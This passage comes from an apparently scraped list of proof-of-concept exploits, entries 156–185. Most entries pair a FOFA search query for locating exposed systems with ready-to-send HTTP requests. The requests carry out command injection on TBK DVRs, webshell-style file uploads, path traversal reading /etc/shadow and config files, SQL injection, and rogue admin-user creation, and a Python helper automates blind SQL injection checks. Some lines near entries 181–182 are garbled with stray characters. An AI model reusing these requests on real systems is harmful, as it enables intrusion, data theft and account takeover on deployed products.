Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104 / DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected models:
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc value above URL-decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;  (it writes a marker file and reads it back, so the marker appearing in the response proves execution).

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The file body is only a random marker string; a GET on the stored path that returns the marker confirms the write:
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS / Masa CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The escaped quote in contenthistid is an error probe; entry 187 gives a time-based payload for the same CVE.

159. INFINITT (英飞达) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue carries the content of the uploaded .asmx and is elided here as PAYLOAD. Then request:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 path traversal / arbitrary file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Send the path exactly as shown, with the %2F encoding intact; curl needs --path-as-is so it does not collapse the ../ segments before sending.

161. 科拓 (Keytop) smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. <fileName> sets the file name (a ../ prefix walks out of the upload directory) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: fetch the written file. The sample fileFlow decodes to the marker string jwjnagszaswudhtnhpaw, so the page should return exactly that:
http://x.x.x.x/dizxdell.aspx
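The following is an added example and is not code from the original list or from the vendor. It performs the two steps just described (base64 the content, place it in fileFlow) to build the UploadResume envelope, and parses one back out, which is the inspection a gateway in front of Webservice.asmx would have to do to block traversal names. The namespaces are the ones in the request above; the function names and the rejection rule are this example's own assumptions.

```python
import base64
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Added example, not the vendor's code. Builds and parses the UploadResume SOAP
# body used by the Webservice.asmx request (entry 161): <fileFlow> carries the
# file bytes base64-encoded, <fileName> is passed through verbatim, which is
# why a "../" prefix escapes the upload directory.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TEMPURI = "http://tempuri.org/"
# assumption: extensions the IIS side would execute rather than serve
SERVER_SIDE_EXTENSIONS = {"aspx", "asmx", "ashx", "asp", "asa", "cer", "config"}


def build_upload_resume_envelope(file_name: str, content: bytes,
                                 ip: str = "1", tag: str = "3") -> str:
    """Serialise the request body the way the PoC sends it (single line)."""
    flow = base64.b64encode(content).decode("ascii")
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
        'xmlns:xsd="http://www.w3.org/2001/XMLSchema" '
        f'xmlns:soap="{SOAP_NS}"><soap:Body>'
        f'<UploadResume xmlns="{TEMPURI}"><ip>{escape(ip)}</ip>'
        f"<fileName>{escape(file_name)}</fileName>"
        f"<fileFlow>{flow}</fileFlow><tag>{escape(tag)}</tag>"
        "</UploadResume></soap:Body></soap:Envelope>"
    )


def parse_upload_resume(envelope: str) -> dict:
    """Inverse: what a WAF (or the handler itself) must look at before writing."""
    root = ET.fromstring(envelope.encode("utf-8"))
    req = root.find(f"{{{SOAP_NS}}}Body/{{{TEMPURI}}}UploadResume")
    if req is None:
        raise ValueError("not an UploadResume request")
    return {
        "fileName": req.findtext(f"{{{TEMPURI}}}fileName", default=""),
        "content": base64.b64decode(req.findtext(f"{{{TEMPURI}}}fileFlow", default="")),
    }


def is_dangerous_file_name(file_name: str) -> bool:
    """Reject any directory component (so no traversal) and server-side extensions."""
    parts = file_name.replace("\\", "/").split("/")
    leaf = parts[-1]
    extension = leaf.rsplit(".", 1)[-1].lower() if "." in leaf else ""
    return ".." in parts or len(parts) > 1 or extension in SERVER_SIDE_EXTENSIONS


if __name__ == "__main__":
    env = build_upload_resume_envelope("../../../../dizxdell.aspx", b"jwjnagszaswudhtnhpaw")
    print(env)
    parsed = parse_upload_resume(env)
    print(parsed["fileName"], is_dangerous_file_name(parsed["fileName"]), parsed["content"])
```

Encoding the marker string jwjnagszaswudhtnhpaw reproduces the exact fileFlow value shown in the request, so the builder can be checked against the PoC byte for byte before it is pointed at a test system.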

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The remotePath field chooses the target directory. Uploaded file (its response should contain the marker string):
http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) smart campus management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The upload is stored as update.aspx regardless of the submitted name; the test page prints the marker and then deletes itself:
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
The URL is truncated in the source as shown; the injection point is the sortOrder parameter (boolean-based, MySQL).

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 149

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

MSSQL error-based probe: the CHAR() chain spells "hello", which is echoed back inside the conversion error message. Content-Length above is corrected to the actual body size.


167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

The path value is a product-specific encoding of the target file and is reproduced verbatim from the published PoC.

169. 宏景 (HJSOFT) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

The /templates/attestation/../../ prefix is part of the PoC; send the path un-normalised. MSSQL time-based: a response delayed by about 5 seconds confirms it.

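This entry, the PG_SLEEP payload at the top of this section, and the WAITFOR DELAY / SLEEP() entries that follow are all confirmed by a delayed response, and one slow response is weak evidence on a loaded server. The following is an added example, not part of the original list: it measures a baseline, then two different requested delays, and reports injection only when the observed delay tracks the requested one. `send(payload) -> elapsed seconds` is a caller-supplied timing function (an HTTP client that substitutes the payload into the vulnerable parameter), the thresholds are arbitrary defaults, and the simulated senders at the bottom are constructed stand-ins so the example runs offline; all of these are assumptions of the example, not part of any PoC.

```python
import re
import statistics
from typing import Callable, Sequence

# Added example, not from the original list. Confirms a time-based blind SQL
# injection (WAITFOR DELAY / SLEEP / PG_SLEEP entries) without trusting a single
# timing. `send` is caller-supplied: it issues one request with the given
# payload and returns the elapsed seconds.


def mssql_payload(seconds: int) -> str:
    # shape used by the WAITFOR DELAY entries (e.g. 169, 175, 181, 189, 191)
    return f"1';WAITFOR DELAY '0:0:{seconds}'--"


def mysql_payload(seconds: int) -> str:
    # shape used by the SLEEP() entries (e.g. 171, 187)
    return f"1) AND (SELECT 1 FROM (SELECT(SLEEP({seconds})))x)-- "


def pgsql_payload(seconds: int) -> str:
    # shape used by the PG_SLEEP() payload in the gsdwid field at the top of this section
    return f"1') AND 1=(SELECT 1 FROM PG_SLEEP({seconds})) AND ('a'='a"


def measure(send: Callable[[str], float], payload: str, trials: int) -> float:
    """Median of `trials` timings, so one slow network hop does not decide."""
    return statistics.median(send(payload) for _ in range(trials))


def confirm_time_based(send: Callable[[str], float], benign: str,
                       payload_for: Callable[[int], str],
                       delays: Sequence[int] = (5, 10), trials: int = 3,
                       tolerance: float = 0.8) -> dict:
    """Positive only if every requested delay shows up on top of the baseline AND
    the observed delay grows with the requested one; an endpoint that is merely
    slow passes the first check and fails the second."""
    base = measure(send, benign, trials)
    observed = {d: measure(send, payload_for(d), trials) for d in delays}
    above_baseline = all(observed[d] - base >= d * tolerance for d in delays)
    lo, hi = min(delays), max(delays)
    scales = observed[hi] - observed[lo] >= (hi - lo) * tolerance
    return {"baseline": base, "observed": observed,
            "injectable": above_baseline and scales}


# --- constructed stand-ins for `send` (assumptions) so the example runs offline ---
_DELAY_RE = re.compile(r"DELAY '0:0:(\d+)'|SLEEP\((\d+)\)", re.I)


def simulated_vulnerable_send(payload: str) -> float:
    """Behaves like an injectable endpoint: 0.2 s plus whatever sleep the payload asks for."""
    m = _DELAY_RE.search(payload)
    requested = int(next(g for g in m.groups() if g)) if m else 0
    return 0.2 + requested


def simulated_fixed_send(latency: float) -> Callable[[str], float]:
    """Behaves like a non-injectable endpoint with constant latency, fast or slow."""
    return lambda payload: latency


if __name__ == "__main__":
    for name, gen in (("mssql", mssql_payload), ("mysql", mysql_payload), ("pgsql", pgsql_payload)):
        print(name, confirm_time_based(simulated_vulnerable_send, "1", gen)["injectable"])
    print("slow-but-safe", confirm_time_based(simulated_fixed_send(6.0), "1", mssql_payload)["injectable"])
```

Using two delays rather than one is the point: a target that takes six seconds for every request clears a single 5-second threshold but cannot make the 10-second probe take five seconds longer than the 5-second one.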
170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

MySQL time-based via SLEEP(5); the ;downloadLogger.action suffix is part of the PoC path.

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Send the request line as-is; most HTTP clients collapse the ../ segments before sending (curl needs --path-as-is).

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

The traversal is in the POST body, not the URI, so URI-based filtering alone does not catch it.

174. 金和 (Jinher) OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 (Jinher) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

MSSQL time-based via the IncentiveID parameter.

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

The uploadtime part is sent empty on purpose; the test file removes itself after the first execution.

177. H3C router sensitive information disclosure
Request each of the following paths with GET (one per model); a response containing the device configuration file confirms the issue:
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Note that the stored name comes from the part's name attribute (12234.txt), not from filename. Then fetch the uploaded file:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering project management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

MySQL error-based via the xu parameter: the XPath syntax error returned by updatexml() contains the result of user() between the ~ markers.

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

MSSQL time-based via the start parameter.

+ U. a3 p1 y+ B# |182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建  c. @$ T  X0 G3 n% W% R  b
FOFA:"PDCA/js/_publicCom.js"( O5 ]3 \0 I$ X6 |2 W
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1, p, g  A5 w0 b$ Y
Host: your-ip# A; t; `) k, @2 Y" x4 p1 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36& U, y4 D/ I' k- O! j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( g+ s- s# O$ e9 oAccept-Encoding: gzip, deflate, br# z2 b8 H- S. W4 H, C" K+ s
Accept-Language: zh-CN,zh;q=0.9& d: |  _1 q  O- q+ D( n6 R
Connection: close6 B4 [* o( Q( `$ t1 {$ G
Content-Type: application/x-www-form-urlencoded9 w7 ?9 O1 ^* \" Q
3 j  C" A, C% ]: i) M+ {! J
8 i2 D9 ]. L$ N2 S; H- [* [& U
username=test1234&pwd=test1234&savedays=1. A9 D% f7 V. e! p$ D! _

- U  U, H3 A! R
183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Oracle error-based via the token parameter (ctxsys.drithsx.sn raises an error that carries 111111*111111 = 12345654321). The endpoint is a password-change handler, so test with a loginid that does not exist, as the PoC does with admin11.

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The body is a raw SQL INSERT executed by the endpoint; it adds a user root / 123456 with PURVIEW 4, so clean up after testing.

185. 瑞友天翼 (Realor) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
